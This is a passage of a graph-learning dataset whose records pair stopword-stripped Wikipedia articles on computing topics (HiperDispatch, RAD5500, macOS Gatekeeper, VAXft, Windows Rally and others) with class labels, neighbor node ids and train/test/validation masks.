    "text": "HiperDispatch:hiperdispatch hiperdispatch workload dispatching feature found newest ibm mainframe models system z10 ibm zenterprise system processors running recent releases z/os hiperdispatch introduced february 2008 support added z/vm v6r3 release july 26 2013 one engineering challenges large smp server designs maintain near-linear scalability number cpus increases performance throughput double doubling number processors many overhead factors including contention cache main memory access overhead factors become increasingly difficult mitigate number cpus increases design goal delivering maximum performance minimize overhead factors new mainframe model supports higher maximum number cpus 64 main processors single system z10 mainframe example engineering challenge becomes ever important hiperdispatch helps address problem combination hardware features z/os dispatching z/os workload manager z/os may tasks waiting processing attention transaction programs task often requires access memory large smp design system z cpus physically closer faster access cache memory might hold supporting data particular tasks hiperdispatch exploits fact steers tasks cpus likely fastest access relevant data already cache particular cpu busy hiperdispatch first wait finish task even another less favorable cpu idle however limitations patient hiperdispatch governed workload manager goals z/os workload manager senses risk pending task miss service level responding within certain number milliseconds user request example workload manager hiperdispatch send task idle cpu processing even cpu must fetch data slower main memory hiperdispatch offers little cpu savings benefit machines configured relatively small number cpus however feature help quite lot cpu count increases ibm mainframe capacity tables thus software pricing based assumption hiperdispatch active benefit hiperdispatch parking logical cpus number cpus z/os dispatches work closely matches lpar weight applicable even small machine configurations benefit reduction short engine effect making system performance responsive workload manager wlm must configured correctly hiperdispatch work well mainframe users latent problems wlm goal settings exposed hiperdispatch option disable hiperdispatch cases mainframe users want correct issues right away z/os system resource manager srm configure z/os system resource manager modify parmlib-member ieaoptxx hiperdispatch=yes|no yes srm turn hiperdispatch mode srm turn hiperdispatch mode partitions 64 logical processors ipl time forced run hiperdispatch=yes ipl lpars 64 logical processors switch hiperdispatch=no case hiperdispatch=yes z196 follow-on cpcs vary cpu management automatically turned independent varycpu -specification default value",
    "neighbors": [
      2168,
      7242,
      7733,
      7802
    ],
    "mask": "Test"
  },
  {
    "node_id": 10213,
    "label": 4,
    "text": "Computer_security_incident_management:computer security incident management fields computer security information technology computer security incident management involves monitoring detection security events computer computer network execution proper responses events computer security incident management specialized form incident management primary purpose development well understood predictable response damaging events computer intrusions incident management requires process response team follows process definition computer security incident management follows standards definitions described national incident management system nims incident coordinator manages response emergency security incident natural disaster event requiring response emergency services incident coordinator would act liaison emergency services incident manager computer security incident management administrative function managing protecting computer assets networks information systems systems continue become critical personal economic welfare society organizations public private sector groups associations enterprises must understand responsibilities public good welfare memberships stakeholders responsibility extends management program “ things go wrong. ” incident management program defines implements process organization may adopt promote welfare security public event observable change normal behavior system environment process workflow person components three basic types events computer security information technology personnel must handle emergency events according well-defined computer security incident response plan incident event attributable human root cause distinction particularly important event product malicious intent harm important note incidents events many events incidents system application failure due age defect may emergency event random flaw failure incident security incident coordinator manages response process responsible assembling team coordinator ensure team includes individuals necessary properly assess incident make decisions regarding proper course action incident team meets regularly review status reports authorize specific remedies team utilize pre-allocated physical virtual meeting place investigation seeks determine circumstances incident every incident warrant require investigation however investigation resources like forensic tools dirty networks quarantine networks consultation law enforcement may useful effective rapid resolution emergency incident incident response steps detection- incident detected sensor network analyst user reporting something unusual his/her pc containment- event malicious network traffic computer virus incident response manager stop traffic taking computer network clean- run virus scan remove virus wipe computer clean reimage machine reverse engineering- use computer forensics tools understand malicious traffic occurred first place incident completely understood make plans decrease future risk",
    "neighbors": [
      9319,
      7560,
      2090,
      10190,
      5327,
      11198,
      8533,
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 10214,
    "label": 3,
    "text": "RAD5500:rad5500 rad5500 radiation-hardened 64-bit multi-core processor platform created bae systems electronics intelligence support based powerpc e5500 designed ibm freescale semiconductor successor rad750 rad5500 processor platform use high radiation environments experienced board satellites spacecraft rad5500 platform supports vpx high speed connectors ddr2/ddr3 memory serialize/deserialize serdes spacewire io rad5500 family radiation-hardened processors based versions freescale semiconductor e5500-based qoriq system-on-chip rad5510 rad5515 rad5545 radspeed-hb host bridge four system chip processors implemented rad5500 cores produced 45 nm soi technology ibm trusted foundry rad5510 rad5515 processors employ single rad5500 core intended medium processing capability environments require low power consumption 11.5 13.7 watts respectively processor provides 1.4 giga operations per second gops 0.9 gflops performance rad5545 processor employs four rad5500 cores achieving performance characteristics 5.6 giga-operations per second gops 3.7 gflops power consumption 20 watts peripherals operating based rad5545 radspeed-hb intended host processing data management support one four radspeed dsps radspeed-hb replaces secondary ddr2/ddr3 memory interface connection found rad5545 connections radspeed dsps instead note radspeed dsps entirely different processors specialized digital signal processing confused radspeed-hb serves host bridge rad5545 spacevpx single-board computer use harsh environmental conditions outer space designed operating temperatures −55 °c 125 °c radiation-hardened total ionizing dose 100 krad silicon chips 6u-220 format module compliant ansi/vita 78.00 spacevpx standard includes either rad5515 rad5545 processor rad5545 spacevpx single-board computer produced bae systems facility manassas virginia u.s. department defense category 1a microelectronics trusted source",
    "neighbors": [
      6914,
      4868,
      10501,
      3846,
      4743,
      6663,
      5642,
      1548,
      1933,
      398,
      3472,
      4881,
      7065,
      1563,
      1309,
      3493,
      6949,
      6311,
      8102,
      1321,
      9391,
      10543,
      4017,
      5297,
      8120,
      6715,
      9020,
      1725,
      1983,
      1985,
      5825,
      10180,
      336,
      8530,
      3540,
      342,
      9302,
      11613,
      6878,
      1635,
      869,
      10985,
      3185,
      4211,
      5235,
      8058,
      3323,
      8700
    ],
    "mask": "None"
  },
  {
    "node_id": 10215,
    "label": 2,
    "text": "MotoMagx:motomagx motomagx linux kernel-based mobile operating system developed launched 2007 motorola run mid-to-high-end mobile phones system based montavista mobilinux originally intended 60 upcoming devices soon dropped favor android windows mobile operating systems motomagx compatible motorola gsm/umts devices shown due lack implementation compatible qualcomm cdma2000 devices result motorola often sold multiple device variants radically different firmware example motorola razr2 t-mobile shipped motomagx whereas razr2 verizon wireless shipped motorola p2k firmware created significant confusion customers user experience varied widely two identical devices simply based carrier phones based os",
    "neighbors": [
      2179,
      6276,
      11271,
      4364,
      3089,
      10393,
      6301,
      5406,
      4383,
      673,
      3626,
      7727,
      3248,
      7857,
      7983,
      823,
      7991,
      9784,
      1083,
      7483,
      5824,
      7492,
      11079,
      7246,
      2001,
      4305,
      2259,
      7253,
      3542,
      3162,
      607,
      10080,
      2658,
      8423,
      10599,
      3561,
      6763,
      6508,
      2925,
      495,
      5363,
      1524,
      5369,
      8315,
      8316,
      8829,
      11391
    ],
    "mask": "Train"
  },
  {
    "node_id": 10216,
    "label": 4,
    "text": "The_Diana_Initiative:diana initiative diana initiative computer security conference based las vegas nevada aimed supporting women cybersecurity first diana initiative conference took place 2017 diana initiative founded cheryl biswas virginia robbins pablo breuer elizabeth etherington michael smith 2019 conference held westin las vegas def con",
    "neighbors": [
      7449
    ],
    "mask": "Validation"
  },
  {
    "node_id": 10217,
    "label": 3,
    "text": "Dragon_Slayer:_The_Legend_of_Heroes:dragon slayer legend heroes originally released 1989 nec pc-8801 within next years would also ported nec pc-9801 msx 2 sharp x68000 sega mega drive super famicom turbografx-cd pc engine cd-rom dragon slayer legend heroes barcode battler card set also released epoch co. 1992 pc engine version released united states turbografx-cd game series released us playstation portable remake legend heroes iv akai shizuku 1995 version game broadcast exclusively japanese markets via super famicom satellaview subunit name bs dragon slayer eiyu densetsu 1998 remake legend heroes bundled remake released playstation sega saturn korean conversion original pc-9801 version released ms-dos/ibm pc mantra samsung 1996 japanese pc edition released 1997 game soundtrack composed members soundtrack turbografx-16 version arranged upon release famitsu scored pc engine cd-rom version 29 40 1991 later scored super famicom version 29 40 1992 sega mega drive version 23 40 1994 january 1993 issue electronic games magazine electronic gaming awards nominated turbografx-cd version 1992 multimedia game year award stated demonstrates far multimedia come since design team ys ii mammoth quest meticulously detailed incorporates highly involved game play",
    "neighbors": [
      770,
      3113,
      6797,
      9006,
      9166,
      10931,
      11443,
      9658,
      1596
    ],
    "mask": "Test"
  },
  {
    "node_id": 10218,
    "label": 4,
    "text": "OneID:oneid oneid digital security service based redwood city california oneid sells digital identity system claims provide security across devices using public key cryptography instead passwords technology utilized non-profits salsa labs increase frequency security online donations company founded 2011 serial entrepreneur steve kirsch kirsch recruited engineers jim fenton adam back bobby beckmann create flagship product launched early 2012 following launch company raised us 7 million venture capital financing menlo park-based venture capital firm khosla ventures following series alex doll took position ceo doll previously executive-in-residence khosla ventures founding executive pgp corp. doll appointment founder kirsch moved cto role shirish sathaye general partner khosla ventures jonathan heiliger added oneid board directors following growth period late 2013 company appointed kirsch ceo 2014 fast company named oneid one top 10 innovative companies finance",
    "neighbors": [],
    "mask": "Test"
  },
  {
    "node_id": 10219,
    "label": 7,
    "text": "Lucidpress:lucidpress lucidpress web-based desktop publishing software application developed lucid software used create brochures flyers newsletters business cards posters magazines presentations built web standards html5 javascript lucidpress supported modern web browsers including google chrome firefox safari internet explorer 8+ though started platform single users small businesses lucidpress found substantial user bases education enterprise spaces october 2013 lucid software announced lucidpress public beta version following release lucidpress featured techcrunch venturebeat pc world techcrunch noting chance test app launch indeed easy use 've ever used desktop publishing app past 'll feel right home lucidpress features kind standard top-bar menu layout options publishing apps terms features also hold similar desktop-based apps october 2013 lucidpress became available g suite marketplace may 2015 lucidpress hit 1 million users one year later june 2016 lucidpress hit 2 million users announced advanced template locking feature november 2016 lucidpress announced print ship feature users order printed versions documents create lucidpress october 2016 lucidpress conducted survey research firm demand metric impact brand consistency report titled impact brand consistency contains insights 200 senior marketing brand leaders found among insights consistent brand marketing worth estimated 23 increase revenue lucid software raised 1 million seed 2011 led google ventures may 2014 company received 5 million investment round led salt lake-based kickstart seed fund september 2016 company received 36 million investment spectrum equity whose previous investments include online platforms ancestry.com lynda.com prezi surveymonkey kickstart seed fund grayhawk capital also participated round lucidpress alternative complex design programs like adobe indesign microsoft publisher especially mac users design capabilities range single-page documents like business cards flyers multi-page documents like annual reports digital magazines lucidpress accessible anywhere modern web browsers documents securely stored cloud application require download incorporating real-time collaborative editor lucidpress allows multiple users edit document simultaneously users also make comments chat collaborators real time lucidpress content published several different mediums including lucidpress offers large library templates designing print digital content template categories include lucidpress fully integrated google drive google apps known g suite lucidpress integration consistently one top productivity apps g suite marketplace users import images flickr facebook dropbox",
    "neighbors": [
      3462,
      7983,
      4623,
      5078,
      6367
    ],
    "mask": "Test"
  },
  {
    "node_id": 10220,
    "label": 3,
    "text": "VAXft:vaxft vaxft family fault-tolerant minicomputers developed manufactured digital equipment corporation dec using processors implementing vax instruction set architecture isa vaxft stood virtual address extension fault tolerant systems ran openvms operating system first supported vms 5.4 two layered software products vaxft system services vms volume shadowing required support fault-tolerant features vaxft redundancy data stored hard disk drives vaxft systems shared basic system architecture vaxft system consisted two zones operated lock-step zone zone b zone fully functional computer capable running operating system identical hardware configuration lock-step achieved hardware cpu module cpu module zone connected crosslink cable crosslink cables carried results instructions executed one cpu module compared hardware results instructions executed latter ensure identical two zones kept synchronous clock signal carried crosslink cables hardware failure occurred one zones affected zone brought offline without bringing zone continued operate normal repairs completed offline zone powered automatically resynchronized zone restoring redundancy vaxft model 310 introduced vaxft 3000 model 310 code named cirrus introduced february 1990 shipped june first vaxft model dec first fault-tolerant computer generally available 1991 launch new vaxft models vax 3000 model 310 renamed follow new naming scheme becoming vaxft model 310 model 310 theoretical maximum performance 3.8 vups announced model 310 starting price us 200,000 august 1990 slow sales prompted dec reduce us price model 310 us 168,000 used ka520 cpu module containing 16.67 mhz 60 ns cycle time cvax+ chip set 32 kb external secondary cache system contained two cpu modules one zone running lock-step vaxft model 110 code named cirrus entry-level model announced 18 march 1991 alongside three models model 110 essentially low-cost model vaxft model 310 theoretical maximum performance 2.4 vups contained two zones packed side side enclosure compared model 310 limited expandability regards memory storage capacity available options available either pedestal rackmount configuration rackmount configuration pedestal without plastic covers casters fitted standard 19-inch retma cabinet zone five-slot backplane ka510 cpu module one three 32 mb ms520 memory modules one two kfe52 system i/o controller modules one two dec wancontroller 620 dsf32 wide area network wan communications adapters leftmost slot first slot primary system controller resided first slot cpu module second memory modules third fourth fifth slots second system i/o controller resided either fourth fifth slots wan communications adapters also fourth fifth slots basic system contained cpu module memory module system i/o controller dec wancontroller 620 designed use vaxft systems provided two synchronous lines bandwidth 64 kb lines could operated two independent lines paired provide redundancy vaxft model 410 code named cirrus ii mid-range model announced 18 march 1991 alongside three models originally supposed ship june july 1991 delayed september 1991 reason given dec wanted tune new release vms system model 410 identical model 310 used ka550 cpu module containing 28.57 mhz 35 ns cycle time soc microprocessor 128 kb external secondary cache supported 256 mb memory model 410 theoretical maximum performance 6.0 vups vaxft model 610 code named cirrus ii mid-range model announced 18 march 1991 alongside three models originally supposed ship june july 1991 delayed september 1991 reason given dec wanted tune new release vms system model 610 architecturally identical model 410 except two zones packaged vertically 60 high cabinet zone zone b cabinet storage capacity systems packaged pedestals reason model 610 intended data centers could one two expander cabinets placed left right system additional storage devices cabinets front rear cooled vaxft model 612 high-end model announced 18 march 1991 alongside three models originally supposed ship june july 1991 delayed september 1991 reason given dec wanted tune new release vms system model 612 vaxcluster two vaxft model 610s expansion cabinet positioned two systems standard theoretical maximum performance 12.0 vups second expansion cabinet could added two system cabinets vaxft model 810 code named jetstream high-end model introduced october 1993 instead targeted introduction date late summer early fall 1992 system developed dec manufactured italian industrial manufacturer alenia spa theoretical maximum performance 30.0 vups model 810 third generation vaxft system contained two zones vertically packaged cabinet optional expansion cabinet could connected system addition two uninterruptable power supplies one zone used ka560-aa cpu module contained two 83.33 mhz 12 ns cycle time nvax+ microprocessors 512 kb b-cache l2 cache module two microprocessors operated lock-step fashion like previous vaxft systems two cpu modules system one two zones operated lock-step fashion model 810 cabinet 60.0 cm 24 wide 170.0 cm 67 high 86.0 cm 34 deep",
    "neighbors": [
      7234,
      3142,
      8390,
      3945,
      8474,
      10733,
      5358,
      7983,
      9742,
      5873,
      10734,
      499,
      11604,
      1722,
      9723,
      8732
    ],
    "mask": "Validation"
  },
  {
    "node_id": 10221,
    "label": 2,
    "text": "Gatekeeper_(macOS):gatekeeper macos gatekeeper security feature macos operating system apple enforces code signing verifies downloaded applications allowing run thereby reducing likelihood inadvertently executing malware gatekeeper builds upon file quarantine introduced mac os x leopard expanded mac os x snow leopard feature originated version 10.7.3 mac os x lion command-line utility spctl graphical user interface added os x mountain lion later also version 10.7.5 lion security privacy panel system preferences user three options command-line utility spctl provides granular controls custom rules individual blanket permissions well option turn gatekeeper upon download application particular extended file attribute quarantine flag added downloaded file attribute added application downloads file web browser email client added torrent downloaders transmission bittorrent client bit torrent behavior disabled default third-party applications developers need opt system also force behavior upon individual applications using signature-based system named xprotect user attempts open application attribute system delay execution verify whether since snow leopard system keeps two blacklists identify known malware insecure software blacklists updated periodically application blacklisted file quarantine refuse open recommend user move trash gatekeeper refuse open application code-signing requirements met apple revoke developer certificate application signed prevent distribution application passed file quarantine gatekeeper allowed run normally verified override gatekeeper user acting administrator either switch lenient policy security privacy panel system preferences authorize manual override particular application either opening application context menu adding spctl developers sign disk images verified unit system macos sierra allows developers guarantee integrity bundled files prevent attackers infecting subsequently redistributing addition path randomization executes application bundles random hidden path prevents accessing external files relative location feature turned application bundle originated signed installer package disk image user manually moved application without files another directory effectiveness rationale gatekeeper combating malware acknowledged met reservations security researcher chris miller noted gatekeeper verify developer certificate consult known-malware list application first opened malware already passed gatekeeper stopped addition gatekeeper verify applications quarantine flag flag added applications system neglect failure trigger gatekeeper according security blogger thomas reed bittorrent clients frequent offenders flag also added application came different source like network shares usb flash drives questions also raised registration process acquire developer certificate prospect certificate theft september 2015 security researcher patrick wardle wrote another shortcoming concerns applications distributed external files libraries even html files contain javascript attacker manipulate files exploit vulnerability signed application application external files redistributed leaving original signature application bundle intact gatekeeper verify individual files security compromised path randomization signed disk images apple provided mechanisms mitigate issue macos sierra",
    "neighbors": [
      5636,
      4615,
      10765,
      5647,
      1042,
      6700,
      4657,
      1074,
      576,
      9802,
      5713,
      3670,
      4184,
      2141,
      4702,
      2149,
      8303,
      6771,
      2676,
      6264,
      9343,
      3719,
      10888,
      11402,
      8852,
      1686,
      7318,
      3228,
      2207,
      1699,
      5292,
      8877,
      1710,
      3766,
      2232,
      9912,
      9406,
      1729,
      6849,
      708,
      713,
      9418,
      3790,
      9430,
      3289,
      4318,
      231,
      9451,
      2288,
      2804,
      7928,
      8441,
      7422,
      11521,
      2819,
      1796,
      10512,
      1299,
      4888,
      11037,
      811,
      3371,
      7983,
      10036,
      4406,
      9529,
      11584,
      4933,
      9035,
      1878,
      7515,
      3428,
      4457,
      4972,
      3462,
      9100,
      9109,
      1439,
      6093,
      7118,
      11225,
      3035,
      4571,
      4068,
      5093,
      487,
      7663,
      5619,
      11251,
      11257,
      7163
    ],
    "mask": "None"
  },
  {
    "node_id": 10222,
    "label": 2,
    "text": "Rudder_(software):rudder software rudder open source audit configuration management utility help automate system configuration across large infrastructures rudder relies lightweight local agent installed managed machine rudder produced normation founded 2010 server-side web interface written scala local agent written c published free software gnu general public license 3.0 rudder created founding team normation first released free software october 2011 rudder 3.0 released february 2015 following operating systems supported root server following operating systems supported rudder nodes packages available platforms",
    "neighbors": [
      4194,
      6797,
      7983,
      5397,
      3705,
      8378,
      9948,
      2045
    ],
    "mask": "None"
  },
  {
    "node_id": 10223,
    "label": 3,
    "text": "Smartbook:smartbook smartbook class mobile device combined certain features smartphone netbook computer produced 2009 2010 smartbooks advertised features always all-day battery life 3g wi-fi connectivity gps typically found smartphones laptop tablet-style body screen size 5 10 inches physical soft touchscreen keyboard german company sold laptops brand smartbook held trademark word many countries including big markets like united states china japan india acted preempt others using term smartbook describe products smartbooks tended designed entertainment purposes productivity typically targeted work online applications projected sold subsidized mobile network operators like mobile phones along wireless data plan advent much popular tablets like android tablets ipad coupled prevailing popularity conventional desktop computers laptops displaced smartbook smartbook concept mentioned qualcomm may 2009 marketing snapdragon technology products expected later year difficulties adapting key software particular adobe proprietary flash player arm architecture delayed releases first quarter 2010 smartbooks would powered processors energy-efficient traditional ones typically found desktop laptop computers first smartbooks expected use variants linux operating system google android chrome os arm processor would allowed achieve longer battery life many larger devices using x86 processors february 2010 abi research projected 163 million smartbooks would ship 2015 many countries word smartbook trademark registered smartbook ag august 2009 german court ruled qualcomm must block access germany webpages containing word smartbook unless smartbook ag mentioned smartbook ag defended trademark february 2010 ruling prevented lenovo using term end 2010 qualcomm ceo paul jacobs admitted tablet computers ipad already occupied niche smartbook name dropped february 2011 qualcomm legal battle german patent office ruled words smart book could used however several trademarks registered march 2009 always innovating company announced touch book based texas instruments omap 3530 implemented arm cortex-a8 architecture originally developed texas instruments beagle board touchscreen detachable keyboard contained second battery device came linux operating system company offered license hardware designs sharp electronics introduced pc-z1 netwalker device august 2009 promised ship date october 2009 featured 5.5 touchscreen runs ubuntu arm cortex-a8 based freescale i.mx515 packaged small clamshell design sharp reported device weighs less 500 grams run 10 hours one battery charge device said run 720p video 2d 3d graphics acceleration comes adobe flash lite 3.1 installed pegatron asus company showed working prototype smartbook august 2009 consisted arm cortex-a8 based freescale i.mx515 supports 2d/3d graphics well 720p hd video 512 mb ddr2 ram 1024x600 8.9 lcd screen bluetooth 2.0 802.11g run sd card also featured one usb one micro usb port vga port well card reader smartbook ran ubuntu netbook 9.04 contained version adobe flash player date bill materials pegatron smartbook prototype 120 november 2009 pegatron said received large number orders smartbooks would launch early 2010 devices rumored sell 200 subsidized asus announced plans release smartbook first quarter 2010 asus later postponed smartbook launch second quarter 2010 qualcomm expected announce smartbook november 12 2009 analyst meeting lenovo device concept shown announced january 2010 may 2010 skylight cancelled late january 2010 u.s. federal communications commission fcc listing featured device hp referred smartbook prototype device already shown earlier beginning february mobile world congress barcelona hp announced bring device market specifications likely following end march 2010 smartbook made appearance fcc time listing 3g capabilities according fcc device support gsm 850 1900 well wcdma ii v bands wcdma bands may indicate usage network united states details product available hp website june 2010 smartbook device toshiba announced features nvidia tegra processor able remain stand-by mode 7 days device officially available toshiba united kingdom site originally delivered android v2.1 upgradable v2.2 since 2011 also modified run customized linux distribution japan sold dynabook az genesi company announced mx smartbook part efika line august 2010 originally priced us 349 reviewers questioned small enough fit definition ostensibly derivative above-mentioned pegatron design september 2009 foxconn announced working smartbook development november 2009 quanta computer pre-production snapdragon powered sample smartbook device ran android unveiled companies like acer inc. planned release smartbook due popularity tablets macbook air ultrabooks plans scrapped",
    "neighbors": [
      9863,
      5384,
      6539,
      10768,
      4264,
      7983,
      5681,
      11062,
      823,
      9913,
      1083,
      10945,
      1480,
      2635,
      5963,
      9163,
      3537,
      6618,
      7519,
      8044,
      9964,
      6001,
      499
    ],
    "mask": "Test"
  },
  {
    "node_id": 10224,
    "label": 3,
    "text": "Motorola_68881:motorola 68881 motorola 68881 motorola 68882 floating-point coprocessor fpu devices used computer systems conjunction 68020 68030 microprocessors motorola 68881 introduced 1984 addition one devices added substantial cost computer added floating-point unit could rapidly perform floating point mathematical calculations mid 1980s feature useful mostly scientific mathematical software 68020 68030 cpus designed separate 68881 chip mind instruction sets reserved f-line instructions – opcodes beginning hexadecimal digit f could either forwarded external coprocessor used traps would throw exception handing control computer operating system fpu present system os would either call fpu emulator execute instruction equivalent using 68020 integer-based software code return error program terminate program crash require reboot 68881 eight 80-bit data registers 64-bit mantissa plus sign bit 15-bit signed exponent allowed seven different modes numeric representation including single-precision double-precision extended-precision defined ieee floating-point standard ieee 754 designed specifically floating-point math general-purpose cpu example instruction required address calculations main cpu would handle 68881 took control cpu/fpu pair designed could run time cpu encountered 68881 instruction would hand fpu operands needed instruction fpu would release cpu go execute next instruction 68882 improved version 68881 better pipelining eventually available higher clock speeds instruction set exactly 68881 motorola claimed marketing literature executed instructions 40 faster 68881 clock speed though reflect typical performance seen modest improvement table 68882 pin compatible 68881 used direct replacement systems important software incompatibility 68882 used larger fsave state frame affected unix preemptive multitasking oses modified allocate space 68881 68882 used sun microsystems sun-3 workstations ibm rt pc workstations apple computer macintosh ii family next computer sharp x68000 amiga 3000 atari mega ste tt falcon030 third-party amiga atari products used 68881 68882 memory-mapped peripheral 68000 statistics came comp.sys.m68k faq statistics listed 16 mhz 20 mhz 68882 though chips indeed produced starting motorola 68040 floating point support included cpu",
    "neighbors": [
      7299,
      3844,
      4741,
      1158,
      4868,
      7302,
      7305,
      10501,
      3467,
      1548,
      6415,
      5264,
      7830,
      6807,
      2073,
      7065,
      8102,
      7211,
      7983,
      5297,
      11314,
      1461,
      11447,
      8761,
      6715,
      8893,
      1983,
      7104,
      9665,
      1090,
      10945,
      4807,
      3017,
      4810,
      8525,
      336,
      8530,
      3540,
      3932,
      2653,
      3936,
      9312,
      7269,
      9964,
      8048,
      3185,
      10224,
      5235,
      372,
      5492,
      7286,
      3319,
      10357,
      8058,
      8700,
      1534
    ],
    "mask": "Test"
  },
  {
    "node_id": 10225,
    "label": 3,
    "text": "Intel_Socket_G3:intel socket g3 socket g3 also known rpga 946b/947 fcpga 946 socket intel microprocessors supports haswell-based mobile cpus compatible skus 'm suffix model number socket g3 designed replacement socket g2 also known rpga 988b socket g3 holes make contact 946 947 pins processor pin grid array pga lynx point platform controller hub pch associated socket g3 socket rpga 947 one extra pin hole identical socket g3 last pin grid array socket intel mobile processors mobile processors microarchitectures succeding haswell exclusively available bga packaging",
    "neighbors": [
      3588,
      5901,
      7058,
      5523,
      2455,
      3992,
      8855,
      11417,
      3995,
      4252,
      6175,
      7714,
      10019,
      4523,
      2604,
      2350,
      6192,
      9649,
      4537,
      2237,
      7105,
      4805,
      7110,
      8394,
      3403,
      4427,
      4179,
      3798,
      4185,
      7002,
      9945,
      11484,
      9570,
      10468,
      613,
      8552,
      1260,
      4717,
      371,
      9592,
      4217,
      8442
    ],
    "mask": "Train"
  },
  {
    "node_id": 10226,
    "label": 7,
    "text": "Email_backbone:email backbone email backbone typically middleware email infrastructure manages smtp-based applications internal external email message routing policy management enforcement email backbone normally portion email infrastructure sits gateway dmz layer “ email groupware system ” layer messaging infrastructure microsoft exchange lotus notes/domino email backbone sometimes referred messaging fabric messaging infrastructure layer many businesses either considering actively migrating cloud-based email offer number important benefits benefits may include lower cost ownership predictable costs shift capital expenditure capex operational cost opex model less demand internal resources typical email infrastructure functions moved cloud include email filtering layer spam virus protection message archiving email groupware system mailboxes email backbone layer typically stays on-premises benefits moving email cloud compelling quantifiable advantages keeping email backbone layer messaging infrastructure on-premises leveraging cloud-based services common email functions spam virus filtering end user mailbox system microsoft exchange example on-premises email backbone provide policy management enforce outbound messaging policies encrypting sensitive messages contents email leaves organization benefits on-premises email backbone include ability manage wide variety mobile platforms potentially lower cost ability maintain legacy records management systems integration existing voicemail systems many organizations complex routing smtp application requirements require use email backbone even key parts email infrastructure migrated cloud example routing control requirements quite complex often satisfied cloud-based email systems examples requirements include enterprise level choice manage email decision on-premises cloud rather services remain on-premises managed cloud next several years email management evolve toward hybrid model using email backbone virtually smallest organizations",
    "neighbors": [
      4194,
      5608,
      9909,
      8122,
      9053
    ],
    "mask": "None"
  },
  {
    "node_id": 10227,
    "label": 7,
    "text": "Clesh:clesh clesh clip load edit share cloud-based video editing platform designed consumers prosumers online communities integrate user generated content core technology based forscene geared towards professionals working example broadcasting news media post production video audio graphical content uploaded clesh via standard web browser mobile device phone tablet desktop software dv capture firewire hosted material reviewed searched edited published online anyone standard web browser compatible mobile device clesh supports storyboard shot selection frame-accurate editing transitions various functions pan zoom colour light correction audio levels content published formats example podcast mpeg2 html5 video proprietary java format cloud-based software provides greater scope sharing information collaborating compared lan desktop based systems users cloud-based software rely cloud owner adequate security performance resilience clesh assert rights uploaded content contrast platforms youtube rights content uploaded clesh remain author services available clesh users clesh based technology forscene array servers internet backbone provide cloud computing platform host clesh white-label solution clesh would branded hosted per client requirement end-users access clesh rich user interface clients standard java-enabled web browsers android enabled mobile devices tablets smartphones clesh launched january 2006 subject several upgrades year extend functionality including storyboard podcasting moderation chat showreel 2007 consumers offered clesh via subscription model upgrades include web start graphics upload mr paparazzi selects clesh platform host video offering truetube 2008 choosing use clesh manage video portal several upgrades applied include better audio quality image enhancement controls transitions fades titles additional publishing options jpeg 2010 version clesh demonstrated android os tablet device samsung galaxy tab several upgrades applied including html5 publishing pan zoom overlays",
    "neighbors": [
      3593,
      4194,
      1083,
      3300
    ],
    "mask": "None"
  },
  {
    "node_id": 10228,
    "label": 9,
    "text": "Ioke_(programming_language):ioke programming language ioke dynamic strongly typed prototype-based programming language targeting java virtual machine common language runtime designed ola bini developer jruby simple homoiconic syntax somewhat similar io ioke designed expressiveness else including performance designed important tool example language-oriented programming encourages creation domain-specific languages ioke first announced november 6 2008 ioke code contains documentation unit tests",
    "neighbors": [
      9345,
      6502,
      9926,
      11625,
      8430,
      10198,
      1591,
      9245,
      5567
    ],
    "mask": "Train"
  },
  {
    "node_id": 10229,
    "label": 2,
    "text": "Windows_Rally:windows rally windows rally set technologies microsoft intended simplify setup maintenance wired wireless network-connected devices aim increase reliability security connectivity users connect devices internet computers running microsoft windows technologies provide control network quality service qos diagnostics data sharing communications entertainment windows rally technologies provide provisioning following devices windows rally includes following set technologies link layer topology discovery lltd protocol enables applications discover devices determine network topology windows vista enables graphical view devices network network map windows xp computers appear network map lltd responder must downloaded installed devices provide audio video playback bandwidth sensitive implement qos extension part protocol receive prioritized streams changes available bandwidth less impact playback experience windows vista includes qwave pre-configured quality service api time dependent multimedia data audio video streams qwave uses different packet priority schemes real-time flows multimedia packets best-effort flows file downloads e-mails ensure real time data gets delayed little possible providing high quality channel data packets qwave-enabled applications together devices implement lltd qos extensions aim improve end user experience streaming video prioritizing traffic reducing effects network-related transient issues windows connect wcn name windows rally technologies aimed simpler wireless device configuration windows connect users running windows vista windows xp sp2 create network configuration settings transmit access point alternatively users also print configuration settings reference manually configuring device windows connect one following methods may used easier configuration devices profile web services dpws standard defines minimal set implementation constraints enable secure web service messaging discovery description eventing resource-constrained devices dpws describes set requirements enable device discovered clients describe available services clients dpws similar universal plug play upnp fully aligned web services technology supports standards device connectivity ws-discovery ws-eventing includes numerous extension points allowing integration device-provided services enterprise-wide application scenarios roaming devices work across internet windows vista web services devices wsdapi unmanaged code implementation devices profile web services dpws standard windows communication foundation wcf executes managed code offers enterprise-level services web services solutions windows xp windows vista support simple service discovery protocol ssdp ws-discovery extensible discovery support protocols windows vista includes function discovery api function discovery serves abstraction layer applications devices allowing applications discover devices referencing device function rather bus type nature connection function discovery api aims create applications enumerate system resources use devices specific type discover manage lists devices objects sorted functionality class whether local network connected function discovery supports extensible discovery provider model vendors also create custom provider expose resources function discovery pnp-x uses ssdp ws-discovery network communication protocols make network-connected devices discoverable connected directly computer bus universal serial bus usb pnp-x allows network-connected devices appear devices inside windows connected physically provides installation experience similar attaching bus-connected device device manufacturer implements pnp-x capabilities supplement either upnp web services devices wsd enabled devices result end users device relatively easy install traditional plug play devices universal plug play upnp ip-based protocol suite based preliminary versions web services protocols xml simple object access protocol soap upnp device dynamically join network obtain ip address convey capability discover presence capabilities devices network information set services particular device type provide captured xml device description document device hosts device description also lists properties device name icons associated device upnp adopted widely devices interact home network audio-video scenarios upnp supported windows windows xp windows vista windows vista upnp integrated pnp-x function discovery",
    "neighbors": [
      10243,
      9734,
      10769,
      9234,
      1043,
      540,
      1055,
      2083,
      8227,
      1577,
      4143,
      9263,
      11316,
      1077,
      8246,
      10829,
      4174,
      4178,
      9813,
      603,
      2145,
      1656,
      5754,
      9340,
      5761,
      9348,
      5765,
      10886,
      2183,
      651,
      5259,
      653,
      6797,
      3224,
      4771,
      7846,
      10414,
      8391,
      6353,
      214,
      9943,
      9434,
      2783,
      736,
      4321,
      6370,
      4836,
      1770,
      11498,
      3821,
      10991,
      2804,
      6927,
      9491,
      5401,
      5913,
      11546,
      4384,
      10020,
      2854,
      11559,
      10024,
      10026,
      10029,
      11570,
      5952,
      1348,
      844,
      5454,
      10079,
      5472,
      11616,
      2943,
      9609,
      9612,
      8080,
      9114,
      10654,
      8607,
      11683,
      3496,
      425,
